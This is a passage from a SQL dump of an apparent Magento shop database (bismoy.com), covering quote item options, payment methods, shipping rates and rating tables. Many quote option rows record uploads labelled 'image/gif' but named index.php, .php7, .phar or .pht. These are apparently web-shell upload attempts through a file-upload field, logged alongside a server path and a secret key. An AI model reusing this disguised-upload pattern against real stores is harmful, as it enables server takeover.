(492, 480, 2062, 'info_buyRequest', '{\"options\":{\"516\":{\"type\":\"image\\/gif\",\"title\":\"516index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/1\\/516index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/1\\/516index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/1\\/516index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(493, 481, 2062, 'info_buyRequest', '{\"options\":{\"773\":{\"type\":\"image\\/gif\",\"title\":\"773index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/7\\/773index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/7\\/773index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/7\\/773index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(494, 482, 2062, 'info_buyRequest', '{\"options\":{\"457\":{\"type\":\"image\\/gif\",\"title\":\"457index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/5\\/457index_1.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/5\\/457index_1.php\",\"order_path\":\"custom_options\\/quote\\/4\\/5\\/457index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(495, 483, 2062, 'info_buyRequest', '{\"options\":{\"638\":{\"type\":\"image\\/gif\",\"title\":\"638index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/3\\/638index_1.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/3\\/638index_1.php\",\"order_path\":\"custom_options\\/quote\\/6\\/3\\/638index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(496, 484, 2062, 'info_buyRequest', '{\"options\":{\"359\":{\"type\":\"image\\/gif\",\"title\":\"359index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/5\\/359index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/5\\/359index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/5\\/359index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(497, 485, 2062, 'info_buyRequest', '{\"options\":{\"959\":{\"type\":\"image\\/gif\",\"title\":\"959index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/5\\/959index_1.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/5\\/959index_1.php\",\"order_path\":\"custom_options\\/quote\\/9\\/5\\/959index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(498, 486, 2062, 'info_buyRequest', '{\"options\":{\"973\":{\"type\":\"image\\/gif\",\"title\":\"973index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/7\\/973index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/7\\/973index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/7\\/973index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(499, 487, 2062, 'info_buyRequest', '{\"options\":{\"351\":{\"type\":\"image\\/gif\",\"title\":\"351index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/5\\/351index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/5\\/351index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/5\\/351index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(500, 488, 2059, 'info_buyRequest', '{\"uenc\":\"aHR0cHM6Ly9iaXNtb3kuY29tL3JhbXktbW9pc3R1cml6ZWluZy1mYWNlLXdhc2guaHRtbA\",\"product\":\"2059\",\"selected_configurable_option\":\"\",\"related_product\":\"\",\"item\":\"2059\",\"qty\":\"1\"}'),
(501, 489, 2062, 'info_buyRequest', '{\"options\":{\"422\":{\"type\":\"image\\/gif\",\"title\":\"422index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/2\\/422index.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/2\\/422index.php\",\"order_path\":\"custom_options\\/quote\\/4\\/2\\/422index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(502, 490, 2062, 'info_buyRequest', '{\"options\":{\"563\":{\"type\":\"image\\/gif\",\"title\":\"563index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/6\\/563index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/6\\/563index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/6\\/563index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(503, 491, 2059, 'info_buyRequest', '{\"options\":{\"1131440\":{\"type\":\"image\\/gif\",\"title\":\"113144index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113144index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113144index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113144index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1131441\":{\"type\":\"image\\/gif\",\"title\":\"113144index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113144index.php7\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113144index.php7\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113144index.php7\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1131442\":{\"type\":\"image\\/gif\",\"title\":\"113144index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113144index.php8\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113144index.php8\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113144index.php8\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1131443\":{\"type\":\"image\\/gif\",\"title\":\"113144index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113144index.phar\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113144index.phar\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113144index.phar\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1131444\":{\"type\":\"image\\/gif\",\"title\":\"113144index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113144index.pht\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113144index.pht\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113144index.pht\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(504, 492, 2062, 'info_buyRequest', '{\"options\":{\"1131900\":{\"type\":\"image\\/gif\",\"title\":\"113190index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113190index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113190index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113190index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1131901\":{\"type\":\"image\\/gif\",\"title\":\"113190index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113190index.php7\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113190index.php7\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113190index.php7\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1131902\":{\"type\":\"image\\/gif\",\"title\":\"113190index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113190index.php8\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113190index.php8\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113190index.php8\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1131903\":{\"type\":\"image\\/gif\",\"title\":\"113190index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113190index.phar\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113190index.phar\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113190index.phar\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1131904\":{\"type\":\"image\\/gif\",\"title\":\"113190index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113190index.pht\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113190index.pht\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113190index.pht\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(505, 493, 2054, 'info_buyRequest', '{\"options\":{\"1133030\":{\"type\":\"image\\/gif\",\"title\":\"113303index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113303index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113303index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113303index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1133031\":{\"type\":\"image\\/gif\",\"title\":\"113303index.php7\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113303index.php7\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113303index.php7\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113303index.php7\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1133032\":{\"type\":\"image\\/gif\",\"title\":\"113303index.php8\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113303index.php8\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113303index.php8\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113303index.php8\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1133033\":{\"type\":\"image\\/gif\",\"title\":\"113303index.phar\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113303index.phar\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113303index.phar\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113303index.phar\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"},\"1133034\":{\"type\":\"image\\/gif\",\"title\":\"113303index.pht\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/1\\/113303index.pht\",\"quote_path\":\"custom_options\\/quote\\/1\\/1\\/113303index.pht\",\"order_path\":\"custom_options\\/quote\\/1\\/1\\/113303index.pht\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(506, 494, 2062, 'info_buyRequest', '{\"options\":{\"995\":{\"type\":\"image\\/gif\",\"title\":\"995index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/9\\/995index_1.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/9\\/995index_1.php\",\"order_path\":\"custom_options\\/quote\\/9\\/9\\/995index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(507, 495, 2062, 'info_buyRequest', '{\"options\":{\"375\":{\"type\":\"image\\/gif\",\"title\":\"375index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/7\\/375index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/7\\/375index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/7\\/375index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(508, 496, 2062, 'info_buyRequest', '{\"options\":{\"310\":{\"type\":\"image\\/gif\",\"title\":\"310index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/1\\/310index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/1\\/310index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/1\\/310index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}');

-- --------------------------------------------------------

--
-- Table structure for table `quote_payment`
--

CREATE TABLE `quote_payment` (
  `payment_id` int(10) UNSIGNED NOT NULL COMMENT 'Payment ID',
  `quote_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Quote ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `method` varchar(255) DEFAULT NULL COMMENT 'Method',
  `cc_type` varchar(255) DEFAULT NULL COMMENT 'Cc Type',
  `cc_number_enc` varchar(255) DEFAULT NULL COMMENT 'Cc Number Enc',
  `cc_last_4` varchar(255) DEFAULT NULL COMMENT 'Cc Last 4',
  `cc_cid_enc` varchar(255) DEFAULT NULL COMMENT 'Cc Cid Enc',
  `cc_owner` varchar(255) DEFAULT NULL COMMENT 'Cc Owner',
  `cc_exp_month` varchar(255) DEFAULT NULL COMMENT 'Cc Exp Month',
  `cc_exp_year` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Cc Exp Year',
  `cc_ss_owner` varchar(255) DEFAULT NULL COMMENT 'Cc Ss Owner',
  `cc_ss_start_month` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Cc Ss Start Month',
  `cc_ss_start_year` smallint(5) UNSIGNED DEFAULT 0 COMMENT 'Cc Ss Start Year',
  `po_number` varchar(255) DEFAULT NULL COMMENT 'Po Number',
  `additional_data` text DEFAULT NULL COMMENT 'Additional Data',
  `cc_ss_issue` varchar(255) DEFAULT NULL COMMENT 'Cc Ss Issue',
  `additional_information` text DEFAULT NULL COMMENT 'Additional Information',
  `paypal_payer_id` varchar(255) DEFAULT NULL COMMENT 'Paypal Payer ID',
  `paypal_payer_status` varchar(255) DEFAULT NULL COMMENT 'Paypal Payer Status',
  `paypal_correlation_id` varchar(255) DEFAULT NULL COMMENT 'Paypal Correlation ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Quote Payment';

--
-- Dumping data for table `quote_payment`
--

INSERT INTO `quote_payment` (`payment_id`, `quote_id`, `created_at`, `updated_at`, `method`, `cc_type`, `cc_number_enc`, `cc_last_4`, `cc_cid_enc`, `cc_owner`, `cc_exp_month`, `cc_exp_year`, `cc_ss_owner`, `cc_ss_start_month`, `cc_ss_start_year`, `po_number`, `additional_data`, `cc_ss_issue`, `additional_information`, `paypal_payer_id`, `paypal_payer_status`, `paypal_correlation_id`) VALUES
(1, 1, '2020-08-08 01:45:19', '2020-08-08 01:45:19', 'checkmo', NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 0, 0, NULL, NULL, NULL, 'null', NULL, NULL, NULL),
(2, 2, '2020-08-08 01:45:25', '2020-08-08 01:45:25', 'checkmo', NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 0, 0, NULL, NULL, NULL, 'null', NULL, NULL, NULL),
(3, 7, '2020-08-23 05:42:42', '2020-08-23 05:42:42', 'checkmo', NULL, NULL, NULL, NULL, NULL, NULL, 0, NULL, 0, 0, NULL, NULL, NULL, 'null', NULL, NULL, NULL);

-- --------------------------------------------------------

--
-- Table structure for table `quote_shipping_rate`
--

CREATE TABLE `quote_shipping_rate` (
  `rate_id` int(10) UNSIGNED NOT NULL COMMENT 'Rate ID',
  `address_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Address ID',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp() COMMENT 'Updated At',
  `carrier` varchar(255) DEFAULT NULL COMMENT 'Carrier',
  `carrier_title` varchar(255) DEFAULT NULL COMMENT 'Carrier Title',
  `code` varchar(255) DEFAULT NULL COMMENT 'Code',
  `method` varchar(255) DEFAULT NULL COMMENT 'Method',
  `method_description` text DEFAULT NULL COMMENT 'Method Description',
  `price` decimal(20,4) NOT NULL DEFAULT 0.0000 COMMENT 'Price',
  `error_message` text DEFAULT NULL COMMENT 'Error Message',
  `method_title` text DEFAULT NULL COMMENT 'Method Title'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Quote Shipping Rate';

--
-- Dumping data for table `quote_shipping_rate`
--

INSERT INTO `quote_shipping_rate` (`rate_id`, `address_id`, `created_at`, `updated_at`, `carrier`, `carrier_title`, `code`, `method`, `method_description`, `price`, `error_message`, `method_title`) VALUES
(1, 2, '2020-08-08 01:45:19', '2020-08-08 01:45:19', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(2, 2, '2020-08-08 01:45:19', '2020-08-08 01:45:19', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 15.0000, NULL, 'Table Rate'),
(3, 4, '2020-08-08 01:45:25', '2020-08-08 01:45:25', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(4, 4, '2020-08-08 01:45:25', '2020-08-08 01:45:25', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 15.0000, NULL, 'Table Rate'),
(7, 20, '2020-08-23 05:43:22', '2020-08-23 05:43:22', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(8, 36, '2021-04-13 04:29:21', '2021-04-13 04:29:21', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(14, 42, '2021-04-13 05:53:06', '2021-04-13 05:53:06', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(19, 44, '2021-04-13 12:15:38', '2021-04-13 12:15:38', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(22, 46, '2021-04-14 04:56:27', '2021-04-14 04:56:27', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(25, 70, '2021-06-07 04:12:53', '2021-06-07 04:12:53', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(28, 72, '2021-06-08 12:01:18', '2021-06-08 12:01:18', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 25.0000, NULL, 'Fixed'),
(37, 78, '2021-06-09 08:59:09', '2021-06-09 08:59:09', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 10.0000, NULL, 'Fixed'),
(41, 84, '2021-06-15 12:32:37', '2021-06-15 12:32:37', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(44, 172, '2022-07-30 10:36:47', '2022-07-30 10:36:47', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(45, 182, '2022-09-27 13:19:06', '2022-09-27 13:19:06', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(46, 184, '2022-10-07 22:14:03', '2022-10-07 22:14:03', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(47, 186, '2022-10-08 16:38:07', '2022-10-08 16:38:07', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(52, 198, '2023-01-18 10:12:21', '2023-01-18 10:12:21', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(54, 200, '2023-03-05 17:54:27', '2023-03-05 17:54:27', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(55, 256, '2023-08-14 13:11:03', '2023-08-14 13:11:03', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(57, 284, '2023-09-13 03:01:38', '2023-09-13 03:01:38', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(58, 286, '2023-09-18 14:43:11', '2023-09-18 14:43:11', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(59, 330, '2023-11-16 12:30:40', '2023-11-16 12:30:40', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(61, 332, '2023-11-16 12:31:04', '2023-11-16 12:31:04', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(63, 334, '2023-11-16 12:31:28', '2023-11-16 12:31:28', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(65, 336, '2023-11-16 12:31:49', '2023-11-16 12:31:49', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(67, 338, '2023-11-16 12:32:12', '2023-11-16 12:32:12', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(69, 340, '2023-11-16 12:32:33', '2023-11-16 12:32:33', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(71, 372, '2023-12-19 09:59:35', '2023-12-19 09:59:35', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(73, 496, '2024-10-09 08:34:42', '2024-10-09 08:34:42', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(78, 512, '2025-01-28 07:30:00', '2025-01-28 07:30:00', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(80, 514, '2025-01-28 07:30:24', '2025-01-28 07:30:24', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(82, 516, '2025-01-28 07:30:55', '2025-01-28 07:30:55', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(84, 518, '2025-01-28 07:31:21', '2025-01-28 07:31:21', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(86, 520, '2025-01-28 07:31:44', '2025-01-28 07:31:44', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(88, 522, '2025-01-28 07:32:07', '2025-01-28 07:32:07', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(90, 526, '2025-02-07 15:51:27', '2025-02-07 15:51:27', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(91, 528, '2025-02-09 16:26:27', '2025-02-09 16:26:27', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(92, 534, '2025-03-03 03:02:06', '2025-03-03 03:02:06', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(93, 540, '2025-03-09 15:52:27', '2025-03-09 15:52:27', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(95, 542, '2025-03-09 15:52:47', '2025-03-09 15:52:47', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(97, 544, '2025-03-09 15:53:06', '2025-03-09 15:53:06', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(99, 546, '2025-03-09 15:53:21', '2025-03-09 15:53:21', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(101, 548, '2025-03-09 15:53:41', '2025-03-09 15:53:41', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(103, 550, '2025-03-09 15:53:57', '2025-03-09 15:53:57', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(105, 594, '2025-09-28 15:40:53', '2025-09-28 15:40:53', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(106, 644, '2025-12-12 15:03:41', '2025-12-12 15:03:41', 'flatrate', 'Flat Rate', 'flatrate_flatrate', 'flatrate', NULL, 5.0000, NULL, 'Fixed'),
(108, 660, '2025-12-26 22:20:35', '2025-12-26 22:20:35', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(109, 662, '2026-01-02 12:25:14', '2026-01-02 12:25:14', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate'),
(110, 664, '2026-01-02 23:16:05', '2026-01-02 23:16:05', 'tablerate', 'Best Way', 'tablerate_bestway', 'bestway', NULL, 0.0000, NULL, 'Table Rate');

-- --------------------------------------------------------

--
-- Table structure for table `rating`
--

CREATE TABLE `rating` (
  `rating_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Rating ID',
  `entity_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Entity ID',
  `rating_code` varchar(64) NOT NULL COMMENT 'Rating Code',
  `position` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Rating Position On Storefront',
  `is_active` smallint(6) NOT NULL DEFAULT 1 COMMENT 'Rating is active.'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Ratings';

--
-- Dumping data for table `rating`
--

INSERT INTO `rating` (`rating_id`, `entity_id`, `rating_code`, `position`, `is_active`) VALUES
(1, 1, 'Quality', 0, 1),
(2, 1, 'Value', 0, 1),
(3, 1, 'Price', 0, 1),
(4, 1, 'Rating', 0, 1);

-- --------------------------------------------------------

--
-- Table structure for table `rating_entity`
--

CREATE TABLE `rating_entity` (
  `entity_id` smallint(5) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `entity_code` varchar(64) NOT NULL COMMENT 'Entity Code'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Rating entities';

--
-- Dumping data for table `rating_entity`
--

INSERT INTO `rating_entity` (`entity_id`, `entity_code`) VALUES
(1, 'product'),
(2, 'product_review'),
(3, 'review');

-- --------------------------------------------------------

--
-- Table structure for table `rating_option`
--

CREATE TABLE `rating_option` (
